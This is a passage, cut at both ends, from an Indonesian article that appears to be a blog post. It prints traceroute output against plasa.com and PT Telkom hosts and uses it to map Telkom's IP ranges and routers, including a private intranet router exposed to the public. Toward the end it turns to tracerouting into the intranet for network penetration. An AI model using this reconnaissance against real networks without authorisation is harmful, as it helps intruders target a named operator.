www.plasa.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;traceroute to www.plasa.com (202.134.0.172), 30 hops max, 38 byte packets&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;1&lt;span style=""&gt;  &lt;/span&gt;Digital-Tc.indo.net.id (202.159.33.29)&lt;span style=""&gt;  &lt;/span&gt;187.690 ms&lt;span style=""&gt;  &lt;/span&gt;189.692 ms&lt;span style=""&gt;  &lt;/span&gt;189.757 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;2&lt;span style=""&gt;  &lt;/span&gt;Subnet-Gateway.indo.net.id (202.159.33.32)&lt;span style=""&gt;  &lt;/span&gt;189.820 ms&lt;span style=""&gt;  &lt;/span&gt;178.021 ms&lt;span style=""&gt;  &lt;/span&gt;179.822 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;3&lt;span style=""&gt;  &lt;/span&gt;Loral-Gateway.indo.net.id (202.159.32.1)&lt;span style=""&gt;  &lt;/span&gt;189.840 ms&lt;span style=""&gt;  &lt;/span&gt;199.950 ms&lt;span style=""&gt;  &lt;/span&gt;182.850 ms 4&lt;span style=""&gt;  &lt;/span&gt;202.148.63.65 (202.148.63.65)&lt;span style=""&gt;  &lt;/span&gt;216.687 ms *&lt;span style=""&gt;  &lt;/span&gt;219.695 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;5&lt;span style=""&gt;  &lt;/span&gt;* * 198.32.204.83 (198.32.204.83)&lt;span style=""&gt;  &lt;/span&gt;300.194 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;6&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;* s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241)&lt;span style=""&gt;  &lt;/span&gt;490.050 ms&lt;span style=""&gt;  &lt;/span&gt;409.613 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;7&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;* FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149)&lt;span style=""&gt;  &lt;/span&gt;300.095 ms&lt;span style=""&gt;  &lt;/span&gt;309.653 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;8&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174)&lt;span style=""&gt;  &lt;/span&gt;349.822 ms&lt;span style=""&gt;  &lt;/span&gt;299.629 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;9&lt;span style=""&gt;  &lt;/span&gt;www.plasa.com (202.134.0.136)&lt;span style=""&gt;  &lt;/span&gt;400.178 ms&lt;span style=""&gt;  &lt;/span&gt;389.508 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Tampaknya &lt;a href="http://www.plasa.com/"&gt;www.plasa.com&lt;/a&gt; berada di Jakarta, karena memlalui beberapa mesin / router penting Telkom yang ada di Jakarta; mesin gcc, sm2 kemungkinan ada di Semanggi / Sentral telkom di Gatot Subroto – yah itu hanya tebakan dari gaya penamaan mesin Telkom yang kemungkinan mengambil referensi pola penamaan tempat cara abri yang agak kriptik tapi terprediksi Waktu yang dibutuhkan untuk mengirimkan paket &amp;amp; dikembalikan lagi oleh &lt;a href="http://www.plasa.com/"&gt;www.plasa.com&lt;/a&gt; adalah sekitar 400 mili detik.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;[root@gate onno]# traceroute in-mta1.telkom.co.id&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;traceroute to in-mta1.telkom.co.id (202.134.0.196), 30 hops max, 38 byte packets 1&lt;span style=""&gt;  &lt;/span&gt;Digital-Tc.indo.net.id (202.159.33.29)&lt;span style=""&gt;  &lt;/span&gt;507.252 ms&lt;span style=""&gt;  &lt;/span&gt;489.515 ms&lt;span style=""&gt;  &lt;/span&gt;509.857 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;2&lt;span style=""&gt;  &lt;/span&gt;* Subnet-Gateway.indo.net.id (202.159.33.32)&lt;span style=""&gt;  &lt;/span&gt;200.130 ms&lt;span style=""&gt;  &lt;/span&gt;199.694 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;3&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;Loral-Gateway.indo.net.id (202.159.32.1)&lt;span style=""&gt;  &lt;/span&gt;199.793 ms&lt;span style=""&gt;  &lt;/span&gt;189.703 ms&lt;span style=""&gt;  &lt;/span&gt;189.889 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;4&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;202.148.63.65 (202.148.63.65)&lt;span style=""&gt;  &lt;/span&gt;389.829 ms&lt;span style=""&gt;  &lt;/span&gt;269.620 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;5&lt;span style=""&gt;  &lt;/span&gt;* * *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;6&lt;span style=""&gt;  &lt;/span&gt;s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241)&lt;span style=""&gt;  &lt;/span&gt;869.655 ms&lt;span style=""&gt;  &lt;/span&gt;669.665 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;559.793 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;7&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149)&lt;span style=""&gt;  &lt;/span&gt;489.828 ms&lt;span style=""&gt;  &lt;/span&gt;419.716 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;8&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174)&lt;span style=""&gt;  &lt;/span&gt;369.912 ms&lt;span style=""&gt;  &lt;/span&gt;219.670 ms&lt;span style=""&gt;  &lt;/span&gt;219.859 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;9&lt;span style=""&gt;  &lt;/span&gt;in-mta2.plasa.com (202.134.0.196)&lt;span style=""&gt;  &lt;/span&gt;339.852 ms&lt;span style=""&gt;  &lt;/span&gt;239.796 ms&lt;span style=""&gt;  &lt;/span&gt;289.778 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Secara tidak sengaja kita bisa melihat ternyata in-mta1.telkom.co.id adalah juga in-mta2.plasa.com, artinya semua mail ke orang telkom dengan hostname telkom.co.id akan bisa di tangkap di in-mta2.plasa.com juga. Ini agak berbahaya sebetulnya untuk sebuah perusahaan seperti Telkom. Tampaknya in-mta2.plasa.com, in-mta1.telkom.co.id &amp;amp; &lt;a href="http://www.plasa.com/"&gt;www.plasa.com&lt;/a&gt; berada dalam sebuah keluarga jaringan 202.134.0.x. Jika kita mengetahui struktur organisasi Telkom, berarti 202.134.0.x merupakan tempat penyimpanan mesin-mesin yang dikelola oleh Divisi Multimedia yang mengelola plasa.com.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;[root@gate onno]# traceroute www.telkom.net.id&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;traceroute to www.telkom.net.id (202.134.0.12), 30 hops max, 38 byte packets&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;1&lt;span style=""&gt;  &lt;/span&gt;Digital-Tc.indo.net.id (202.159.33.29)&lt;span style=""&gt;  &lt;/span&gt;197.334 ms&lt;span style=""&gt;  &lt;/span&gt;189.571 ms&lt;span style=""&gt;  &lt;/span&gt;189.805 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;2&lt;span style=""&gt;  &lt;/span&gt;Subnet-Gateway.indo.net.id (202.159.33.32)&lt;span style=""&gt;  &lt;/span&gt;199.799 ms&lt;span style=""&gt;  &lt;/span&gt;189.752 ms&lt;span style=""&gt;  &lt;/span&gt;189.969&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;3&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;Loral-Gateway.indo.net.id (202.159.32.1)&lt;span style=""&gt;  &lt;/span&gt;189.734 ms&lt;span style=""&gt;  &lt;/span&gt;199.678 ms&lt;span style=""&gt;  &lt;/span&gt;189.795 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;4&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;202.148.63.65 (202.148.63.65)&lt;span style=""&gt;  &lt;/span&gt;249.844 ms&lt;span style=""&gt;  &lt;/span&gt;316.807 ms&lt;span style=""&gt;  &lt;/span&gt;289.855 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;5&lt;span style=""&gt;  &lt;/span&gt;* * *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;6&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;* s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241)&lt;span style=""&gt;  &lt;/span&gt;260.189 ms&lt;span style=""&gt;  &lt;/span&gt;299.710 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;7&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;* FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149)&lt;span style=""&gt;  &lt;/span&gt;320.187 ms&lt;span style=""&gt;  &lt;/span&gt;319.636 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;8&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;* GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174)&lt;span style=""&gt;  &lt;/span&gt;330.246 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;9&lt;span style=""&gt;  &lt;/span&gt;game.plasa.com (202.134.0.12)&lt;span style=""&gt;  &lt;/span&gt;460.078 ms *&lt;span style=""&gt;  &lt;/span&gt;420.131 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Ah semakin yakin saja kita, dari hasil traceroute &lt;a href="http://www.telkom.net.id/"&gt;www.telkom.net.id&lt;/a&gt; terlihat sekali bahwa ternyata &lt;a href="http://www.telkom.net.id/"&gt;www.telkom.net.id&lt;/a&gt; ternyata identik dengan game.plasa.com. Jelas bahwa semua keluarga besar plasa.com &amp;amp; telkom.net.id adalah servis TelkomNet yang merupakan bagian dari servis Divisi Multimedia PT. Telkom; termasuk tentunya TelkomNet Instant yang sering menjadi bulan-bulan ISP Indonesia yang lain yang menunjukan ketidak adilan (ketidak fairan) Telkom dalam memberikan servis di Indonesia.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Menarik untuk di simak ternyata Divisi Multimedia memegang keluarga IP 202.134.0.x sangat predictable sekali karena logikanya 202.134.x.x kemungkinan besar adalah keluarga IP-nya PT. Telkom, dan nomor terkecil (0) di ambil oleh penyelenggara / operator-nya, yaitu Divisi Multimedia. Dari hasil traceroute juga terlihat bahwa jaringan backbone / router utama Telkom tampaknya menggunakan keluarga IP 202.134.3.x.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Selanjutnya kita mencoba melihat bagaimana dengan kantor pusat PT. Telkom Indonesia di Bandung. Mari kita lihat hasil traceroute ke &lt;a href="http://www.telkom.co.id/"&gt;www.telkom.co.id&lt;/a&gt; yang tampaknya berada di kantor pusat PT. Telkom di Bandung.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;[root@gate onno]# traceroute www.telkom.co.id&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;traceroute to www.telkom.co.id (202.134.2.15), 30 hops max, 38 byte packets&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;1&lt;span style=""&gt;  &lt;/span&gt;Digital-Tc.indo.net.id (202.159.33.29)&lt;span style=""&gt;  &lt;/span&gt;341.254 ms&lt;span style=""&gt;  &lt;/span&gt;189.285 ms&lt;span style=""&gt;  &lt;/span&gt;189.863 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;2&lt;span style=""&gt;  &lt;/span&gt;Subnet-Gateway.indo.net.id (202.159.33.32)&lt;span style=""&gt;  &lt;/span&gt;389.814 ms&lt;span style=""&gt;  &lt;/span&gt;539.738 ms&lt;span style=""&gt;  &lt;/span&gt;339.843 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 23.25pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;3&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;Loral-Gateway.indo.net.id (202.159.32.1)&lt;span style=""&gt;  &lt;/span&gt;379.842 ms&lt;span style=""&gt;  &lt;/span&gt;189.737 ms&lt;span style=""&gt;  &lt;/span&gt;629.806 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 23.25pt; text-align: justify; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt;4&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;* * *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;5&lt;span style=""&gt;  &lt;/span&gt;198.32.204.83 (198.32.204.83)&lt;span style=""&gt;  &lt;/span&gt;520.177 ms&lt;span style=""&gt;  &lt;/span&gt;529.823 ms&lt;span style=""&gt;  &lt;/span&gt;489.612 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;6&lt;span style=""&gt;  &lt;/span&gt;* * s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241)&lt;span style=""&gt;  &lt;/span&gt;490.196 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;7&lt;span style=""&gt;  &lt;/span&gt;* FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149)&lt;span style=""&gt;  &lt;/span&gt;720.213 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;8&lt;span style=""&gt;  &lt;/span&gt;* * *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;&lt;span style=""&gt; &lt;/span&gt;9&lt;span style=""&gt;  &lt;/span&gt;* * fe-sm2.jakarta.telkom.net.id (202.134.3.179)&lt;span style=""&gt;  &lt;/span&gt;599.379 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;10&lt;span style=""&gt;  &lt;/span&gt;s0-lembong.bandung.telkom.net.id (202.134.3.38)&lt;span style=""&gt;  &lt;/span&gt;719.669 ms&lt;span style=""&gt;  &lt;/span&gt;659.553 ms S4.lbg.bandung.telkom.net.id (202.134.3.50)&lt;span style=""&gt;  &lt;/span&gt;529.925 ms&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;11&lt;span style=""&gt;  &lt;/span&gt;192.168.16.250 (192.168.16.250)&lt;span style=""&gt;  &lt;/span&gt;765.193 ms&lt;span style=""&gt;  &lt;/span&gt;859.890 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:8;"  &gt;12&lt;span style=""&gt;  &lt;/span&gt;202.134.2.15 (202.134.2.15)&lt;span style=""&gt;  &lt;/span&gt;1070.083 ms&lt;span style=""&gt;  &lt;/span&gt;769.732 ms *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:8;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:8;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Dari hasil traceroute ke &lt;a href="http://www.telkom.co.id/"&gt;www.telkom.co.id&lt;/a&gt; ada yang menggelitik hati saya, ternyata ada router di IntraNet Telkom menggunakan IP 192.168.16.250 yang tampak ke jaringan public. Ini terus terang, agak menyalahi pakem untuk mendisain jaringan yang baik. Router yan menjadi firewall ke jaringan IntraNet telkom tampaknya ber-alamat IP 202.134.3.50.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Biasanya jaringan IntraNet 192.168.x.x &amp;amp; 10.x.x.x, harusnya tertutup untuk dilihat oleh publik. Jika perancang jaringan tersebut secara benar merancang jaringannya akan sangat sulit melakukan penetrasi jaringan menggunakan traceroute. Salah satu cara untuk melakukan traceroute menembus IntraNet, adalah dengan melakukan traceroute pada 